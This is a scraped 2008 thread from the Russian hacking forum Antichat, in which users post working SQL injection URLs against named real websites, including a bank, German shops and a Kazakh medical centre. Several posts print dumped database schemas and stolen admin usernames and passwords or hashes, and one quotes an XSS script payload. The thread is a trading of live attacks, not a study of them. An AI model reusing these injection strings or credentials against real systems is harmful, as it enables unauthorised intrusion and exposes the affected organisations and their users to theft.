ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6351  
Старый 16.08.2008, 22:42
Аватар для FaR-G9
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935

Репутация: 64
Отправить сообщение для FaR-G9 с помощью ICQ
По умолчанию

http://www.krabbelnu.com/categorie.php?cat=99999999+union+select+version()/*

version(): 5.0.38-Ubuntu_0ubuntu1.4-log
database(): 22928krabb
user(): 22928krabb@10.0.1.69

в БД 2 таблицы : krabbel_plaatjes и links

krabbel_plaatjes:
Код:
   plaatje_id
   plaatje_url
   plaatje_cat
links
Код:
   id
   titel
   url
   important
   dik
 
Ответить с цитированием

  #6352  
Старый 16.08.2008, 22:53
Аватар для Shaitan-Devil
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Цитата:
Сообщение от S0ulVortex  
http://www.womennet.ca/directory.php?browse&"><script>alert('S0ulVortex') </script>
это не скуля это xss помойму
Нет там не Хсс 90%.Где-то я такое втречал,имхо нужен посимвольный.
 
Ответить с цитированием

  #6353  
Старый 16.08.2008, 23:08
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Shaitan-Devil  
Нет там не Хсс 90%.Где-то я такое втречал,имхо нужен посимвольный.
http://www.womennet.ca/directory.php?browse&1/**/union/**/select/**/1,version(),3,4,5/*

PS И давай на будующее, вопросы в соседнюю тему
 
Ответить с цитированием

  #6354  
Старый 17.08.2008, 01:48
Аватар для SWAT
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

какой-то банк
http://www.fibank.al/index.php?language=-1/**/union/**/select/**/1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17/*

Database: website
User: webmaster@localhost
Version: 5.0.32-Debian_7etch6-log

Table: Columns]
[0]admins: ID,username,password
[1]contents: ID,menuID,priority,typeID,c1,c2,c3,c4,c5,c6,c7,c8, c9,c10,fileext,showonweb,preview
[2]dropdown: ID,name_1,name_38,tablename,priority,name_
[3]errors: ID,name_1,name_38
[4]feedbackform: ID,fieldname,fieldtype,name_1,name_38,name_81
[5]feedbacks: company,name,office,phone,fax,email,subject,answer ,content,ID,recorddate
[6]forms: ID,name_1,name_38,fieldname,fieldtype,comment_1,co mment_38,formname
[7]menus: ID,parent,name,priority,showonweb,preview
[8]offices: ID,email,name_1,name_38,name_81
[9]ordercalc: ID,name_1,name_38
[10]orders: ID,office,volume,slanguage,tlanguage,theme,qtime,q uantity,correction,professional,delivery,model,mod elother,storage,format,formatother,payment,notes,s ubmited,datep,duration,address,technics,uploadfile
[11]prices: ID,slanguageID,tlanguageID,priceperpage,priceperwo rd,priceperhour,priceperhoursim
[12]qcountries: ID,q,name_1,name_38
[13]qtimes: ID,name_1,q,name_38
[14]types: ID,Name,Description,c1,c2,c3,c4,c1type,c2type,c3ty pe,c4type,fileext,hasimage,c5,c6,c7,c8,c9,c10,c5ty pe,c6type,c7type,c8type,c9type,c10type,image1,imag e2,image3,image4,image5,image6,image7,image8,image 9,image10,priority
[15]users: username
 
Ответить с цитированием

  #6355  
Старый 17.08.2008, 03:07
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

Какая-то америкосовская научная муть...

http://www.testzentrale.de/?mod=detail&id=1'+union+select+1,concat(0x3a3a,unh ex(hex(username)),0x3a3a,unhex(hex(password))),3,4 ,5,6+from+_verwaltung.tbl_user+limit+1,3/*

http://www.hogrefe.com/index.php?mod=login
Login:schuler@uni-hohenheim.de pass:ZeUs
 
Ответить с цитированием

  #6356  
Старый 17.08.2008, 03:24
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.bueroschnaeppchen.de/shop/seller.php?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a3a,pas sword),8+from+users+limit+1,10/*

login: nmb pass: 37f2123f20176519<-хз что
 
Ответить с цитированием

  #6357  
Старый 17.08.2008, 05:30
Аватар для Гаральд
Гаральд
Новичок
Регистрация: 28.06.2007
Сообщений: 2
Провел на форуме:
19771

Репутация: 2
Отправить сообщение для Гаральд с помощью ICQ
По умолчанию

http://www.autoexotica.ru/news/?nid=130'
 
Ответить с цитированием

  #6358  
Старый 17.08.2008, 05:39
Аватар для Гаральд
Гаральд
Новичок
Регистрация: 28.06.2007
Сообщений: 2
Провел на форуме:
19771

Репутация: 2
Отправить сообщение для Гаральд с помощью ICQ
По умолчанию

http://www.safin.com/index.php?c=england&t=3'&cat=3'&subcat=16'
 
Ответить с цитированием

  #6359  
Старый 17.08.2008, 06:10
Аватар для DDoSька
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

Цитата:
Сообщение от Гаральд  
http://www.autoexotica.ru/news/?nid=130'
http://www.autoexotica.ru/news/?nid=130+UNION+SELECT+1,2,3,4,5,6,7,8,9,0,1/*
Там стоит IPB
PS: Поробуй почитай фак по скулям и раскрути
 
Ответить с цитированием

  #6360  
Старый 17.08.2008, 07:02
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://medcenter.kz/?mid=-1+union+select+1,concat(name,char(13),pass),3,4,5, 6,7,8,9+from+users+limit+1,1--

login: mcadmin
pass: ordamed.kz
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ